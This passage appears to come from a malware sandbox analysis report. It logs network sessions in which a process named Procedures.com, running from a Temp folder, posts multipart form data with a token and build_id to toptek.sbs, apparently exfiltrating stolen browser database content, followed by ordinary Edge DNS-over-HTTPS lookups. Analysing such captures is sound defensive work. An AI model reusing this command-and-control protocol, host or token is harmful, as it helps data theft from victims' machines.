                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:24:05 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49827 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:05 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----P8QIECJ5XBIM7Y5XBAIE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:24:05 UTC | 16355 | OUT | Data Ascii:
------P8QIECJ5XBIM7Y5XBAIE
Content-Disposition: form-data; name="token"

0e82b28cfc26d5aa50292f6553065302
------P8QIECJ5XBIM7Y5XBAIE
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------P8QIECJ5XBIM7Y5XBAIE
Cont
2024-12-23 05:24:07 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:24:07 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49834 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:07 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7YCBIE37YCBAIEC26FCB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 142457
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:24:07 UTC | 16355 | OUT | Data Ascii:
------7YCBIE37YCBAIEC26FCB
Content-Disposition: form-data; name="token"

0e82b28cfc26d5aa50292f6553065302
------7YCBIE37YCBAIEC26FCB
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------7YCBIE37YCBAIEC26FCB
Cont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                                  Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:24:09 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:24:09 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49837 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:08 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----1DTJW47QQ9RQQIMOZU3E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:24:08 UTC | 493 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74
Data Ascii: ------1DTJW47QQ9RQQIMOZU3E
Content-Disposition: form-data; name="token"

0e82b28cfc26d5aa50292f6553065302
------1DTJW47QQ9RQQIMOZU3E
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------1DTJW47QQ9RQQIMOZU3E
Cont
2024-12-23 05:24:10 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:24:10 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49907 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:28 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----P8QIECJ5XBIM7Y5XBAIE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 3165
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:24:28 UTC | 3165 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 50 38 51 49 45 43 4a 35 58 42 49 4d 37 59 35 58 42 41 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 50 38 51 49 45 43 4a 35 58 42 49 4d 37 59 35 58 42 41 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 50 38 51 49 45 43 4a 35 58 42 49 4d 37 59 35 58 42 41 49 45 0d 0a 43 6f 6e 74
Data Ascii: ------P8QIECJ5XBIM7Y5XBAIE
Content-Disposition: form-data; name="token"

0e82b28cfc26d5aa50292f6553065302
------P8QIECJ5XBIM7Y5XBAIE
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------P8QIECJ5XBIM7Y5XBAIE
Cont
2024-12-23 05:24:29 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:24:29 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  17192.168.2.549925172.64.41.34436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-12-23 05:24:29 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecf5edb6438b-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomPc)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49924 | 172.64.41.3 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:29 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-12-23 05:24:29 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecf5f8b98c48-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49932 | 172.64.41.3 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:29 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-12-23 05:24:29 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecf5f8944258-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom c)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49931 | 172.64.41.3 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:29 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-12-23 05:24:29 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecf5ffecc338-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 13 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom))


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49937 | 162.159.61.3 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:29 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
2024-12-23 05:24:29 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecf5fc67c336-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
